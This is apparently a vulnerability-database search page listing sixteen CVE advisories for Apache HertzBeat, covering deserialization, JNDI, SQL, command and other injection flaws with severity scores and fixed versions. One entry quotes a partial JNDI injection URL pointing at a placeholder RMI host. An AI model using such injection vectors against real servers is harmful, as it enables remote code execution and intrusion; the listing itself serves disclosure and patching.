Lucene search
K
ApacheHertzbeat

16 matches found

CVE
CVE
added 2024/02/22 3:39 p.m.96 views

CVE-2023-51653

CVE-2023-51653 affects Hertzbeat real-time monitoring when using JmxCollectImpl.java; the vulnerability arises from JMXConnectorFactory.connect allowing a JNDI injection via the vulnerable URL in the /api/monitor/detect interface. If a URL like service:jmx:rmi:///jndi/rmi://xxxxxx:1099/localHikar...

9.8CVSS9.9AI score0.02131EPSS
Web
CVE
CVE
added 2024/08/20 8:56 p.m.85 views

CVE-2024-42362

CVE-2024-42362 affects Hertzbeat, an open-source real-time monitoring system. It describes an authenticated (user role) remote-code-execution vulnerability via unsafe deserialization in /api/monitors/import. The issue is classified with a high impact (CVSS v3.1: 8.8) affecting confidentiality, in...

8.8CVSS8.6AI score0.0133EPSS
CVE
CVE
added 2024/08/20 8:56 p.m.81 views

CVE-2024-42361

CVE-2024-42361 affects Hertzbeat, versions 1.6.0 and earlier. The vulnerability stems from an endpoint under /api/monitor/{monitorId}/metric/{metricFull} that builds and executes a SQL query using user-controlled data, due to a lack of validation. Reported impact includes potential SQL injection ...

9.8CVSS7.9AI score0.0108EPSS
Web
CVE
CVE
added 2024/02/22 3:59 p.m.71 views

CVE-2023-51389

CVE-2023-51389 affects Hertzbeat, a real-time monitoring system. The vulnerability resides at the /define/yml interface, where SnakeYAML is used to parse YAML without a security configuration, enabling YAML deserialization. Affects versions prior to 1.4.1; version 1.4.1 fixes the issue. The issue...

9.8CVSS9.6AI score0.01294EPSS
Web
CVE
CVE
added 2024/09/21 9:30 a.m.71 views

CVE-2024-42323

Apache HertzBeat (incubating) before version 1.6.0 is affected by a SnakeYAML deserialization vulnerability that enables remote code execution. The issue stems from insecure deserialization of YAML/XML data and is exploitable by authorized attackers. Upgrade to 1.6.0 to fix the issue.

8.8CVSS8.7AI score0.04054EPSS
CVE
CVE
added 2024/02/22 3:53 p.m.69 views

CVE-2023-51388

Hertzbeat real-time monitoring software is affected by CVE-2023-51388 due to direct execution of expressions in CalculateAlarm.java via AviatorEvaluator without a security policy, enabling AviatorScript injection. The issue is tied to Hertzbeat versions prior to 1.4.1; upgrading to version 1.4.1 ...

9.8CVSS9.8AI score0.01309EPSS
CVE
CVE
added 2024/11/18 8:45 a.m.66 views

CVE-2024-45791

CVE-2024-45791 describes an information disclosure in Apache HertzBeat prior to version 1.6.1. The vulnerability exposes sensitive information to unauthorized actors and is addressed by upgrading to HertzBeat 1.6.1. The public documentation in multiple sources (NVD/NVD mirror, Red Hat advisory, C...

7.5CVSS7.5AI score0.00791EPSS
CVE
CVE
added 2025/04/16 3:38 p.m.63 views

CVE-2024-56736

The CVE-2024-56736 entry describes a Server-Side Request Forgery (SSRF) vulnerability in Apache HertzBeat (incubating) affecting versions before 1.7.0. The vulnerability is tied to the Api Config Oss component, with the underlying issue enabling unauthorized server-side requests. Impact details i...

6.5CVSS6.5AI score0.00532EPSS
CVE
CVE
added 2024/11/18 8:45 a.m.61 views

CVE-2024-41151

CVE-2024-41151 : Apache HertzBeat (prior to 1.6.1) contains a deserialization of untrusted data vulnerability. The issue can be exploited by authorized users to achieve code execution, with a CVSSv3.1 base score of 8.8 (HIGH) and network access requiring low privileges and no user interaction. Th...

8.8CVSS8.7AI score0.00955EPSS
CVE
CVE
added 2024/11/18 8:44 a.m.60 views

CVE-2024-45505

CVE-2024-45505 concerns Apache HertzBeat (incubating) prior to 1.6.1, where an improper neutralization of special elements enables a Command Injection. The vulnerability affects execution paths that process constructed commands, allowing an attacker with network access (and with low privileges) t...

8.8CVSS8.8AI score0.02148EPSS
CVE
CVE
added 2023/12/22 3:6 p.m.49 views

CVE-2022-39337

CVE-2022-39337 affects Hertzbeat, a real-time monitoring system. The vulnerability is a permission bypass in versions up to 1.20, allowing bypass of system authentication and invocation of interfaces without authorization. The issue’s root cause is implied to be improper access control in older r...

7.5CVSS7.7AI score0.01111EPSS
CVE
CVE
added 2023/12/22 8:46 p.m.48 views

CVE-2023-51387

CVE-2023-51387 affects Hertzbeat before v1.4.1, where improper sanitization of alert expressions in the aviatorscript evaluation path allows a user with access to the alert define function to execute arbitrary commands on the Hertzbeat server. The root cause is input sanitization in alert express...

8.8CVSS7.7AI score0.01461EPSS
CVE
CVE
added 2023/12/22 8:56 p.m.43 views

CVE-2023-51650

CVE-2023-51650 affects Hertzbeat prior to version 1.4.1, due to Spring Boot permission configuration issues that enable unauthorized access to three interfaces and may disclose sensitive server information. The issue is fixed in v1.4.1. No exploitation details are provided in the available docume...

7.5CVSS7.7AI score0.00865EPSS
CVE
CVE
added 2025/09/09 9:30 a.m.27 views

CVE-2025-24404

Apache HertzBeat (incubating) before 1.7.0 is affected by an XML Injection RCE vulnerability that occurs when an authenticated attacker adds a monitor that parses an XML sitemap response and returns specially crafted content. The issue can lead to remote code execution and impacts confidentiality...

8.8CVSS6.5AI score0.00486EPSS
CVE
CVE
added 2026/02/10 9:28 a.m.20 views

CVE-2026-24343

CVE-2026-24343 affects Apache HertzBeat up to 1.7.9; fixed in 1.8.0. The flaw is an improper neutralization of data within XPath expressions, i.e., an XPath Injection that can cause uncontrolled resource consumption. Affected versions: 1.7.1–1.7.9. Impact metrics indicate high risk (Network attac...

8.8CVSS5.5AI score0.00717EPSS
CVE
CVE
added 2025/09/09 9:31 a.m.18 views

CVE-2025-48208

CVE-2025-48208 describes an LDAP Injection vulnerability in Apache HertzBeat up to version 1.7.2. An attacker with an authenticated account can trigger the flaw by crafting custom LDAP queries, potentially resulting in arbitrary script execution. Remediation: upgrade to version 1.7.3 (fixes the i...

8.8CVSS6.4AI score0.00589EPSS